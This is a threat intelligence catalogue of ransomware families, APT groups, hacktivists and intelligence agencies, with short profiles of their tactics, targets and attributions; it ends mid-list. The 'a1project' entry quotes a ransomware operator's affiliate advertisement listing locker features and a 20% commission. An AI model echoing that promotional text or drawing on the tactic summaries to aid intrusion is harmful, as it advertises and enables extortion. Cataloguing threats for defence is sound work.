Threat Actors
05250lock
Ransomware
0apt
This group is newly observed and first observation suggest this is not a serious group, as most - if not all - of the claims cannot be validated and are for random company names.
Analysis of available GitHub repositories and sandbox detonations suggest the actor lists those sandbox runs as victims.
The extracted data should be approached with a high degree of caution.
0kilobypt
Ransomware
0Mega
0mega, a new ransomware operation, has been observed targeting organizations around the world. The ransomware operators are launching double-extortion attacks and demanding millions of dollars as ransom. 0mega ransomware operation launched in May and has already claimed multiple victims. 0mega maintains a dedicated data leak site that the attackers use to post stolen data if the demanded ransom is not paid. The leak site currently hosts 152 GB of data stolen from an electronics repair firm in an attack that happened in May. However, an additional victim has since been removed, implying that they might have paid the ransom to the 0mega group. How does it work? Hackers add the .0mega extension to the encrypted file’s names and create ransom notes (DECRYPT-FILES[.]txt). The ransom note has a link to a Tor payment negotiation site with a support chat to reach out to the ransomware group. To log in to this site, the victims are asked to upload their ransom notes with a unique Base64-encoded blob identity.
10001
Ransomware
1337-Locker
Ransomware
1937CN
1937CN is a Chinese hacking group that has been active since at least 2013. The group is known for targeting Vietnamese organizations, including government agencies, businesses, and media outlets. 1937CN has been linked to a number of high-profile cyberattacks, including the hacking of Vietnam Airlines in 2016 and the defacement of Vietnamese government websites in 2015.
2023lock
2023Lock is a ransomware strain first observed in January 2024, believed to be an evolution of the Venus and Zeoticus families and a direct precursor to the later TrinityLock variant. It employs a hybrid encryption method combining XChaCha20 and curve25519xsalsa20poly1305, appending the “.2023lock” extension to encrypted files. Upon infection, it delivers ransom notes in HTML, TXT, and HTA formats containing decryption instructions. Unlike many modern ransomware groups, there is no evidence that 2023Lock engages in double extortion or data exfiltration, operating purely through file encryption to pressure victims into payment. Its codebase and operational patterns strongly align with TrinityLock, which emerged a few months later with more sophisticated extortion tactics.
20dfs
ransomware
24H
Ransomware
313 Team
313 Team is an Iraq-based threat actor that has conducted coordinated DDoS campaigns targeting multiple government servers in the UAE, Kuwait, and Romania, often in response to political statements. They have claimed responsibility for significant disruptions, including a one-hour shutdown of Romania’s National Tax Agency and an 18-hour outage of Kuwait's national e-government portal. The group has also engaged in website defacements, showcasing coordinated branding with other aligned groups. Their operations reflect a focus on government infrastructure, employing DDoS techniques and leveraging public political discourse as justification for their attacks.
32aa
ransomware
3am
3AM, also known as ThreeAM, is a relatively new ransomware family that emerged in late 2023, initially deployed as a fallback option when LockBit infections failed. Written in Rust for 64-bit systems, it appends the “.threeamtime” extension to encrypted files and tags them with the marker “0x666,” while deleting Volume Shadow Copies to hinder recovery. 3AM operators use a double extortion strategy, combining file encryption with data theft and threats to leak stolen information. More recent campaigns have shown increased sophistication, incorporating email bombing followed by vishing calls to convince victims to grant remote access via Microsoft Quick Assist. Attackers then deploy virtual machines containing backdoors, allowing them to remain undetected while exfiltrating data before attempting to launch the ransomware payload.
3nCRY
Ransomware
4rw5w
Ransomware
5ss5c(5ss5cCrypt)
Ransomware
5ss5c Ransomware
The cybercrime group that brought us Satan, DBGer and Lucky ransomware and perhaps Iron ransomware, has now come up with a new version or rebranding named 5ss5c. [...] It will however only encrypt files with the following extensions: 7z, bak, cer, csv, db, dbf, dmp, docx, eps, ldf, mdb, mdf, myd, myi, ora, pdf, pem, pfx, ppt, pptx, psd, rar, rtf, sql, tar, txt, vdi, vmdk, vmx, xls, xlsx, zip
610 Office
610 Office
68-Random-HEX
ransomware
777(Legion)
Ransomware
777
Ransomware
7ev3n
Ransomware
7h9r
Ransomware
7z Portuguese
Ransomware
7Zipper Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
8Base Ransomware Actors
This object represents the behaviors associated with operators of 8Base ransomware, who may or may not operate as a cohesive unit. Behaviors associated with samples of 8Base ransomware are represented in the "8Base Ransomware" Software object. The 8Base ransomware operation began claiming significant numbers of victims on its data leak site in June 2023, including organizations in a range of sectors. Researchers have observed considerable similarities between aspects of 8Base's operations and those of other ransomware groups, leading them to suspect that 8Base may be an evolution or offshoot of existing operations. The language in 8Base's ransom notes is similar to the language seen in RansomHouse's notes, and there is strong overlap between the code of Phobos ransomware and 8Base.[[VMWare 8Base June 28 2023](/references/573e9520-6181-4535-9ed3-2338688a8e9f)][[Acronis 8Base July 17 2023](/references/c9822477-1578-4068-9882-41e4d6eaee3f)]
8base
8Base emerged in early 2022 and rapidly escalated its ransomware operations by mid-2023, positioning itself as a “simple pen tester” while executing a relentless double-extortion scheme: encrypting files using AES-256 CBC mode (appending the “.8base” extension) and threatening to leak stolen data via a Tor-accessible leak site. The group leverages initial access methods such as phishing and SmokeLoader, disables security mechanisms like Volume Shadow Copy and firewalls, and deploys persistence via registry and startup entries. Targeting primarily small and medium-sized organizations across sectors such as manufacturing, finance, IT, and healthcare in regions including the U.S., Brazil, and Europe, 8Base has drawn comparisons to Phobos and RansomHouse for its tactics and ransom-note style. In early 2025, international law enforcement operations disrupted the group, resulting in the arrest of four key actors, seizure of servers, and warnings to hundreds of potential victims.
8lock8
Ransomware Based on HiddenTear
a1project
The locker is written in C/C++/ASM.
It supports all systems starting from Windows 2003, has a separate binary for ESXi, and uses a unified encrypted file format across all systems.
WINDOWS:
• Two encryption modes: patch-based and file header.
• Extensive configuration settings: from ignoring specific paths/extensions to terminating services/processes, unlocking occupied files, working with network shares, and more.
• Arguments available for shutting down Hyper-V virtual machines, deleting backups, network scanning with logged-in user tokens.
• Each build includes an obfuscated PowerShell script.
• Execution is password-protected.
• The locker itself is shellcode for x86/x64; if you have custom execution methods, we can provide the shellcode.
ESXI:
• Encrypts files in patches, with configurable path exclusions.
The default configuration is pre-set to avoid disrupting Windows/ESXi/Linux systems.
Our commission is 20% of payouts
AAC
Ransomware
Ababil of Minab
Ababil of Minab is an emerging pro-Iranian hacktivist group with a limited public profile and little verifiable prior activity in threat intelligence reporting. The group claims responsibility for a cyberattack and allegedly possesses administrative access to targeted systems. Their pro-Iran messaging and targeting of a major US public transit authority align with known patterns of Iranian-aligned actors targeting US critical infrastructure. The use of escalatory language suggests potential for further activity.
ABCLocker
Ransomware
Abyss Data
Abyss‑Data, also known as Abyss Locker, is a ransomware operation first identified around March 2023. It conducts double extortion by exfiltrating data and encrypting systems—particularly targeting VMware ESXi virtual environments—then threatening to leak stolen data via a TOR-based leak site if ransom demands aren't met. The group’s Linux variant derives from the Babuk ransomware source code with encryption resembling HelloKitty, using ChaCha–based ciphers. On Windows, Abyss Locker encrypts files (typically appending “.abyss” or randomized extensions), deletes Volume Shadow Copies, manipulates boot policy to disable recovery, and delivers ransom notes (e.g., WhatHappened.txt), often replacing the desktop wallpaper as part of its extortion tactics. Its campaigns have targeted diverse industries—finance, healthcare, manufacturing, technology—across multiple regions, with victim lists prominently featuring organizations in North America.
Acroware Cryptolocker Ransomware
Leo discovered a screenlocker that calls itself Acroware Cryptolocker Ransomware. It does not encrypt.
Actor240524
Actor240524 is a newly identified APT group that targeted Azerbaijani and Israeli diplomats through spear-phishing emails to steal sensitive data. The group employs a Trojan program known as ABCloader and ABCsync, demonstrating capabilities to steal secrets and modify file data. Their operations appear to focus on undermining the cooperative relationship between Azerbaijan and Israel. Actor240524 utilizes various countermeasures to obscure their attack tactics and techniques.
AdamLocker Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The name of the creator is puff69.
Administration for Security and Counterintelligence
Administration for Security and Counterintelligence (Uprava za bezbednost i kontrarazuznavanje) (Police Agency)
adminlocker
AdminLocker was first observed around December 2021 and appears to be a lone operator or small group, with no clear Ransomware-as-a-Service (RaaS) model reported. It uses single-extortion tactics—encrypting files without publicly documented data exfiltration—primarily targeting enterprise and personal systems via methods such as malicious email attachments, cracked software installers, P2P downloads, and malvertising. The ransomware employs symmetric and asymmetric encryption (likely AES combined with RSA) to lock files, appending extensions such as .admin1, .admin2, .admin3, .1admin, .2admin, and .3admin; victims receive a “!!!Recovery File.txt” ransom note with instructions to pay via Tor and Bitcoin. Notable for its multiple simultaneous variants with varied extensions, it reportedly allows victims to decrypt up to five small files as “proof” before demanding ransom. No high-profile sector- or region-specific campaigns are publicly documented.
Adonis
Ransomware
Adrastea
Adrastea is a threat actor who has been active on cybercrime forums, claiming to have breached organizations like MBDA and offering stolen data for sale. They describe themselves as a group of independent cybersecurity experts and researchers. Adrastea has been linked to ransomware operations, data leak platforms, and network access groups. The actor has been known to exploit critical vulnerabilities in target organizations' infrastructure to gain access to sensitive data.
AepCrypt
Ransomware
AeroBlade
AeroBlade is a previously unknown threat actor that has been targeting an aerospace organization in the United States. Their objective appears to be conducting commercial and competitive cyber espionage. They employ spear-phishing as a delivery mechanism, using weaponized documents with embedded remote template injection techniques and malicious VBA macro code. The attacks have been ongoing since September 2022, with multiple phases identified in the attack chain. The origin and precise objective of AeroBlade remain unknown.
AES_KEY_GEN_ASSIST Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc…
AES-Matrix
Ransomware
AES-NI: April Edition
Ransomware
AES-NI Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
AESMew
ransomware
Afrodita
Ransomware
Agence nationale de sécurité
Agence nationale de sécurité (ANS)
Agencia Nacional de Inteligencia
National Intelligence Agency (ANI) – Agencia Nacional de Inteligencia
Agencja Bezpieczeństwa Wewnętrznego
Internal Security Agency - Agencja Bezpieczeństwa Wewnętrznego (ABW)
Agencja Wywiadu
Foreign Intelligence Agency - Agencja Wywiadu (AW)
Agenda Ransomware
Ransomware
Agenzia Informazioni e Sicurezza Esterna
Agenzia Informazioni e Sicurezza Esterna (AISE) - Agency for External Information and Security
Agenzia Informazioni e Sicurezza Interna
Agenzia Informazioni e Sicurezza Interna (AISI) - Agency for Internal Information and Security
Aggressive Inventory Zombies
Aggressive Inventory Zombies is a threat actor involved in a large-scale phishing and pig-butchering network targeting retail brands and cryptocurrency users. They create fraudulent sites using a popular website template that scrapes product details from legitimate e-commerce platforms and integrate chat services for phishing. Financial ties to India have been identified, and collaboration with Stark Industries has led to the dismantling of parts of their infrastructure, revealing the network's breadth. AIZ is also linked to Entropy ransomware infections, which were preceded by detections of Cobalt Strike beacons and Dridex malware.
aGl0bGVyCg
Ransomware
ailock
AiLock is a Ransomware-as-a-Service (RaaS) group first identified in March 2025. It employs a double-extortion approach—encrypting files and threatening to report breaches to regulators or share stolen data with competitors if the ransom isn’t paid. Victims have just 72 hours to respond and up to five days to pay; failure to pay results in data leaks and destruction of recovery tools. The ransomware appends the extension .AiLock to encrypted files, changes file icons to a green padlock with the “AiLock” name, and replaces the desktop wallpaper with a distinctive robot-skull logo. It employs a hybrid encryption scheme, combining ChaCha20 for file encryption with NTRUEncrypt for securing metadata, and uses a multi-threaded design (path-traversal and encryption threads with IOCP) for efficiency. While active campaigns and leak sites are confirmed, specific sectors, regions, and intrusion methods remain undisclosed in public sources.
Air Force Intelligence Department (page does not exist)
Air Force Intelligence Department (military intelligence)
Air Force Intelligence Directorate
Air Force Intelligence Directorate
Air Intelligence (Pakistan)
Air Intelligence (AI)
AiraCrop Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
AiraCrop
Ransomware related to TeamXRat
Akira
Akira is a ransomware variant and ransomware deployment entity active since at least March 2023. [Arctic Wolf Akira 2023](https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/) Akira uses compromised credentials to access single-factor external access mechanisms such as VPNs for initial access, then various publicly-available tools and techniques for lateral movement. [Arctic Wolf Akira 2023](https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/) [Secureworks GOLD SAHARA](https://www.secureworks.com/research/threat-profiles/gold-sahara) Akira operations are associated with "double extortion" ransomware activity, where data is exfiltrated from victim environments prior to encryption, with threats to publish files if a ransom is not paid. Technical analysis of Akira ransomware indicates variants capable of targeting Windows or VMWare ESXi hypervisors and multiple overlaps with Conti ransomware. [BushidoToken Akira 2023](https://blog.bushidotoken.net/2023/09/tracking-adversaries-akira-another.html) [CISA Akira Ransomware APR 2024](https://www.cisa.gov/sites/default/files/2024-04/aa24-109a-stopransomware-akira-ransomware_2.pdf) [Cisco Akira Ransomware OCT 2024](https://blog.talosintelligence.com/akira-ransomware-continues-to-evolve/)
Ako
Once installed, Ako will attempt to delete Volume Shadow Copies and disable recovery services. It will then begin to encrypt all files that do not match a hard-coded list using an unknown algorithm. Whilst this is happening, Ako will scan the affected network for any connected devices or drives for it to propagate to.
Al Mukhabarat Al A'amah
General Intelligence Presidency (GIP) – رئاسة الاستخبارات العامة
Al-Namrood
Ransomware
Alcatraz Locker Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Alco
Ransomware
ALFA Ransomware
Ransomware Made by creators of Cerber
All_Your_Documents Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
ALLANITE
Adversaries abusing ICS (based on Dragos Inc adversary list). ALLANITE accesses business and industrial control (ICS) networks, conducts reconnaissance, and gathers intelligence in United States and United Kingdom electric utility sectors. Dragos assesses with moderate confidence that ALLANITE operators continue to maintain ICS network access to: (1) understand the operational environment necessary to develop disruptive capabilities, (2) have ready access from which to disrupt electric utilities. ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks, including collecting and distributing screenshots of industrial control systems. ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities. ALLANITE conducts malware-less operations primarily leveraging legitimate and available tools in the Windows operating system.
AllCry
Ransomware
AlldataLocker
Ransomware
Alma Ransomware
Ransomware
Alpha Ransomware
Ransomware
Alpha Spider
ALPHA SPIDER is a threat actor known for developing and operating the Alphv ransomware as a service. They have been observed using novel offensive techniques, such as exploiting software vulnerabilities and leveraging legitimate administration tools for malicious activities. ALPHA SPIDER affiliates have demonstrated persistence in exfiltrating data and have shown the ability to bypass security measures like DNS-based filtering and multifactor authentication. Despite lacking specific operational security measures, defenders have opportunities to detect and respond to ALPHA SPIDER's operations effectively.
Alphabet Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. This ransomware poses as Windows 10 Critical Update Service. Offers you to update your Windows 10, but instead encrypts your files. For successful attack, the victim must have .NET Framework 4.5.2 installed on him computer.
Altahrea Team
Altahrea Team is a pro-Iranian hacking group that has been active since at least 2020. The group has claimed responsibility for a number of cyberattacks, including DDoS attacks against Israeli websites, a hack of the Israel Airports Authority website, and a cyberattack on the Orot Yosef power plant in Israel.
ALTDOS
ALTDOS is a threat actor group that has targeted entities in Southeast Asia, including Singapore, Thailand, and Malaysia. They have been involved in data breaches of companies in various sectors, such as real estate and retail, compromising sensitive information like customer names, bank account numbers, and transaction details. ALTDOS uses tactics like ransomware attacks, data exfiltration, and dumping data publicly or for sale on underground forums. The group has been known to demand ransom payments from victims, but also leaks data if demands are not met.
Altoufan Team
ALTOUFAN TEAM is a politically motivated hacktivist group with anti-Zionism, anti-monarchy, and pro-14-February movement sentiments. They have targeted government agencies and organizations in Bahrain and Israel, claiming to support political causes in the region. The group has employed techniques such as credential theft to compromise systems, as demonstrated by their attack on Bahrain's Social Insurance Organization. ALTOUFAN maintains a presence on social media platforms to disseminate their messages and showcase their activities.
Amaranth-Dragon
Amaranth-Dragon is a previously untracked threat actor assessed to be closely linked to the China-affiliated APT 41 ecosystem, exhibiting similar tooling and operational patterns. The group demonstrated technical maturity by rapidly operationalizing CVE-2025-8088, a vulnerability in WinRAR, shortly after its public disclosure. Check Point Research has identified multiple campaigns targeting Cambodia, Thailand, Laos, Indonesia, Singapore, and the Philippines, with operations typically focused on one or two countries at a time. The overlaps in technical and operational indicators strongly suggest that Amaranth-Dragon is either affiliated with or part of the broader APT-41 ecosystem.
AMBA
Ransomware Websites only amba@riseup.net
Amjixius
ransomware
Amnesia-2
Ransomware
Amnesia
Ransomware
Anatova
Ransomware
AnDROid
Ransomware
ANDROMEDA SPIDER
ANDROMEDA SPIDER is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Angela Merkel Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
AngleWare
Ransomware
Angry Likho
Angry Likho is an APT group that has been active since 2023, primarily targeting large organizations and government agencies in Russia and Belarus. Their attacks typically involve spear-phishing emails with malicious attachments, such as RAR archives, and utilize a known payload, the Lumma stealer, for data exfiltration. The group employs a compact infrastructure and has been linked to espionage activities, particularly in sectors like aviation and pharmaceuticals. Their operations have shown a focus on collecting sensitive information, including cryptowallet files and user credentials.
AngryDuck Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Demands 10 BTC
AngryKite
Ransomware
AnimusLocker
Ransomware
Ank
Ank is an active extortion or ransomware group tracked by RansomLook.
Annabelle 2.1
Ransomware
Annabelle
Ransomware
AnonCrack
Ransomware
AnonPop
Ransomware
Anony
Ransomware Based on HiddenTear
Anonymous (Collective)
Anonymous is a decentralized international group of hacktivists known for carrying out cyber attacks against government bodies and corporations worldwide. Their activities often include distributed denial-of-service (DDoS) attacks, website defacements, and data leaks, primarily motivated by opposition to internet censorship, control, and various geopolitical issues.[[Cyber Security Agency of Singapore March 9 2022](/references/382b5b53-8f24-4e20-9493-ccc8187fef51)]
Anonymous KSA
Anonymous KSA is a Saudi hacking group that has executed cyber attacks targeting Indian institutions, including a significant breach of UIDAI's data storage units, leading to access to sensitive information and system disruption. The group claims these actions are in response to India's normalization of ties with Israel and its treatment of Palestinians. They have called for support for the Palestinian cause and accountability for the damage caused by their operations. The group's TTPs include targeting government agencies and leveraging public sentiment to justify their actions.
Anonymous Sudan
Since January 23, 2023, a threat actor identifying as "Anonymous Sudan" has been conducting denial of service (DDoS) attacks against multiple organizations in Sweden. This group claims to be "hacktivists," politically motivated hackers from Sudan. According to Truesec’s report, the threat actor has nothing to do with the online activists collectively known as Anonymous.
Anonymous64
Anonymous 64 is a group accused by China's national security ministry of attempting to gain control of web portals, outdoor electronic screens, and network television. The Ministry of State Security claims that Anonymous 64 is linked to a cyber unit within Taiwan's defense ministry and identifies three active-duty military personnel as its members. The MSS alleges that the group is involved in an influence operation within China, using hacktivism as a cover. The accusations suggest that Anonymous 64 engages in sabotage activities, prompting authorities to call for public reporting of such actions.
AnteFrigus
Ransomware
ANTHROPOID SPIDER
Publicly known as 'EmpireMonkey', ANTHROPOID SPIDER conducted phishing campaigns in February and March 2019, spoofing French, Norwegian and Belizean financial regulators and institutions. These campaigns used macro-enabled Microsoft documents to deliver the PowerShell Empire post-exploitation framework. ANTHROPOID SPIDER likely enabled a breach that allegedly involved fraudulent transfers over the SWIFT network.
Anti-DDos
Ransomware
Anti-Narcotics Force
Anti-Narcotics Force (ANF)
antibrok3rs
Antibrok3rs emerged as an access broker (not a ransomware operator itself) linked to the aftermath of the 2023 MOVEit supply-chain exploitation. From November 2024 through early 2025, this actor has posted stolen data from at least 15 energy-sector victims, including U.S. utilities such as CenterPoint Energy, Entergy, Nevada Energy, and Appalachian Power—data likely obtained via the MOVEit breach. While some analysts suspected ties to the Cl0P ransomware collective, Antibrok3rs publicly denied any such affiliation. The extortion model centers on data leakage without accompanying file encryption—a purely leak-based threat. No delivery, encryption, or ransom note behaviors have been observed, nor is there evidence of RaaS activity.
Antihacker2017 Ransomware
It’s directed to Russian speaking users, there fore is able to infect mosty the old USSR countries. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc … The hacker goes by the nickname Antihacker and requests the victim to send him an email for the decryption. He does not request any money only a warning about looking at porn (gay, incest and rape porn to be specific).
Antihacker2017
Ransomware
Antix Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… The ransom is 0.25 bitcoins and the nickname of the hacker is FRC 2016.
Antlion
Antlion is a Chinese state-backed advanced persistent threat (APT) group, who has been targeting financial institutions in Taiwan. This persistent campaign has lasted over the course of at least 18 months.
Anubi NotBTCWare
Ransomware
Anubis Ransomware Group
Anubis is a ransomware group that emerged in late 2024, known for using double extortion tactics and operating as a ransomware-as-a-service (RaaS). They employ various monetization models, including data ransomware and access monetization affiliate programs. The group is suspected to have former affiliates of other ransomware groups and is active on cybercrime forums like RAMP and XSS.[[Kelacyber February 25 2025](/references/321f34fb-b80b-4bd3-bceb-e51b6214b883)]
Anubis Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. EDA2
Anubis
Anubis is a financially motivated cybercrime group primarily known for its banking trojan operations but also linked to ransomware activity targeting corporate networks. First identified in 2016 and evolving over time, Anubis ransomware attacks have targeted Windows systems, often deployed after initial compromises by the Anubis banking malware or other access vectors such as phishing, malicious email attachments, or exploitation of unpatched vulnerabilities. The group’s ransomware encrypts files using strong symmetric encryption algorithms, appending distinctive extensions and delivering ransom notes with payment instructions via Tor. Anubis has targeted multiple sectors worldwide, including finance, retail, and government, often combining ransomware with credential theft and data exfiltration to maximize pressure on victims. Its infrastructure and tactics overlap with other financially motivated actors, suggesting possible affiliate or shared tool usage within broader cybercriminal ecosystems.
Apocalypse-Missing
Ransomware
Apocalypse
Ransomware decryptionservice@mail.ru recoveryhelp@bk.ru ransomware.attack@list.ru esmeraldaencryption@mail.ru dr.compress@bk.ru
ApocalypseVM
Ransomware Apocalypse ransomware version which uses VMprotect
ApolloLocker
Ransomware
Apos
Apos ransomware surfaced in April 2024 and is best characterized as a data‑broker or leak‑only operation, rather than a traditional file‑encryption ransomware. It has not been observed to conduct encryption, but instead focuses on data exfiltration with threats to leak or sell the stolen information. Targets span sectors such as technology, healthcare, manufacturing, business services, telecommunications, and government—with significant victimology in Brazil, the United States, India, France, Paraguay, and Spain. Reporting suggests its activity tapered off after a few incidents, possibly indicating a one-time campaign or short-lived operation. Though some sources list multiple victims, technical details such as encryption algorithms, ransom notes, or extortion pricing are not publicly documented. Apos is sometimes listed among new or industrial-focused threats observed in Q1 2025, but remains poorly defined in public technical intel.
AppMilad
AppMilad is an Iranian hacking group that has been identified as the source of a spyware campaign called RatMilad. This spyware is designed to silently infiltrate victims' devices and gather personal and corporate information, including private communications and photos. The group has been distributing the spyware through fake apps and targeting primarily Middle Eastern enterprises.
APT.3102
APT.3102 is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
毒云藤 - APT-C-01
APT-C-01又名毒云藤,是一个长期针对中国境内的APT组织,至少从2007年开始活跃。曾对中国国防、政府、科技、教育以及海事机构等重点单位和部门进行了长达11年的网络间谍活动,主要关注军工、中美关系、两岸关系和海洋相关的领域,旨在窃取重大决策及敏感信息。APT-C-01由360威胁情报中心首次披露,结合该组织关联地区常见的蔓藤植物,因此将其命名为“毒云藤”。
美人鱼 - APT-C-07
美人鱼组织(APT-C-07),来自于中东的境外APT组织,已持续活跃了9年。 主要针对政府机构进行网络间谍活动,以窃取敏感信息为目的,已经证实有针对丹麦外交部的攻击。
APT-C-12
According to 360 TIC the actor has carried out continuous cyber espionage activities since 2011 on key units and departments of the Chinese government, military industry, scientific research, and finance. The organization focuses on information related to the nuclear industry and scientific research. The targets were mainly concentrated in mainland China...[M]ore than 670 malware samples have been collected from the group, including more than 60 malicious plugins specifically for lateral movement; more than 40 C2 domain names and IPs related to the organization have also been discovered.
人面狮 - APT-C-15
人面狮行动是活跃在中东地区的网络间谍活动,主要目标可能涉及到埃及和以色列等国家的不同组织,目的是窃取目标敏感数据信息。活跃时间主要集中在2014年6月到2015年11月期间,相关攻击活动最早可以追溯到2011年12月。主要利用社交网络进行水坑攻击,截止到目前总共捕获到恶意代码样本314个,C&C域名7个。
APT-C-27
A threat actor which is ac tive since at least November 2014. This group launched long-term at tacks against organizations in the Syrian region using Android and Windows malwares. Its objective is the theft of sensitive information.
潜行者 - APT-C-30
潜行者组织主要搜集东南亚国家政府机构、国防部门、情报机构等机构敏感信息,其中针对我国就进行了超十年左右的网络攻击。主要针对政府、通信等领域重点单位,攻击最早可以关联追溯到2009年,最早的样本编译时间为2008年,攻击活动一直持续至今。
毒针 - APT-C-31
2018年11月25日,360高级威胁应对团队就在全球范围内第一时间发现了一起针对俄罗斯的APT攻击行动,攻击目标则指向俄罗斯总统办公室所属的医疗机构,此次攻击行动使用了Flash 0day漏洞CVE-2018-15982和Hacking Team的RCS后门程序,结合被攻击目标医疗机构的职能特色,360将此次APT攻击命名为“毒针”行动。
APT-C-34
As reported by ZDNet, Chinese cyber-security vendor Qihoo 360 published a report on 2019-11-29 exposing an extensive hacking operation targeting the country of Kazakhstan. Targets included individuals and organizations involving all walks of life, such as government agencies, military personnel, foreign diplomats, researchers, journalists, private companies, the educational sector, religious figures, government dissidents, and foreign diplomats alike. The campaign, Qihoo 360 said, was broad, and appears to have been carried by a threat actor with considerable resources, and one who had the ability to develop their private hacking tools, buy expensive spyware off the surveillance market, and even invest in radio communications interception hardware.
拍拍熊 - APT-C-37
拍拍熊组织(APT-C-37)针对极端组织“伊斯兰国”展开了有组织、有计划、针对性的长期不间断攻击,其攻击平台为Windows和Android。
军刀狮 - APT-C-38
从2015年7月起至今,军刀狮组织(APT-C-38)在中东地区展开了有组织、有计划、针对性的不间断攻击,其攻击平台为Windows和Android。由于军刀狮组织的攻击目标有一个主要的特色目标是西亚中东某国的库尔德人,另Windows端RAT包含的PDB路径下出现多次的“Saber”,而亚洲狮为该中东国家的代表动物,结合该组织的一些其它特点以及360对 APT 组织的命名规则,我们将该组织命名为军刀狮(APT-C-38)。
蓝色魔眼 - APT-C-41
APT-C-41,是一个具有土耳其背景的APT小组,该APT组织最早的攻击活动可以追溯到2012年。该组织主要针对意大利、土耳其、比利时、叙利亚、欧洲等地区和国家进行攻击活动。2020年,360发现了该组织针对我国相关单位的攻击,并将其命名为APT-C-41。
北非狐 - APT-C-44
北非狐组织(APT-C-44),是一个来自阿尔及利亚的境外APT组织,该组织已持续活跃了3年。北非狐组织主要针对中东地区进行网络间谍活动,以窃取敏感信息为主。相关攻击活动最早可以追溯到2017年11月,至今仍活跃着。
卢甘斯克组织 - APT-C-46
2019年初,国外安全厂商披露了一起疑似卢甘斯克背景的APT组织针对乌克兰政府的定向攻击活动,根据相关报告分析该组织的攻击活动至少可以追溯到2014年,曾大量通过网络钓鱼、水坑攻击等方式针对乌克兰政府机构进行攻击,在其过去的攻击活动中曾使用过开源Quasar RAT和VERMIN等恶意软件,捕获目标的音频和视频,窃取密码,获取机密文件等等。
APT-C-60
APT-C-60
腾云蛇 - APT-C-61
APT-C-61又名腾云蛇,最早活跃可追溯到2020年1月,至今还很活跃,主要攻击目标为巴基斯坦、孟加拉等国家的国家机构、军工、科研、国防等重要领域,攻击时通过鱼叉邮件配合社会工程学手段进行渗透,向目标设备传播恶意程序,暗中控制目标设备,持续窃取设备上的敏感文件。因其使用的C2、载荷下发、窃取的数据存储等均依赖于云服务,且使用的木马为python语言编写而得名。
APT Ransomware v.2
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. NO POINT TO PAY THE RANSOM, THE FILES ARE COMPLETELY DESTROYED
Axiom
Axiom is a suspected Chinese cyber espionage group that has targeted the aerospace, defense, government, manufacturing, and media sectors since at least 2008. Some reporting suggests a degree of overlap between Axiom and Winnti Group but the two groups appear to be distinct based on differences in reporting on TTPs and targeting. [Kaspersky Winnti April 2013](https://securelist.com/winnti-more-than-just-a-game/37029/) [Kaspersky Winnti June 2015](https://securelist.com/games-are-over/70991/) [Novetta Winnti April 2015](https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf)
Moafee
Moafee is a threat group that appears to operate from the Guandong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group DragonOK. [Haq 2014](https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html)
Cleaver
Cleaver is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. [Cylance Cleaver](https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf) Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). [Dell Threat Group 2889](http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/)
Ke3chang
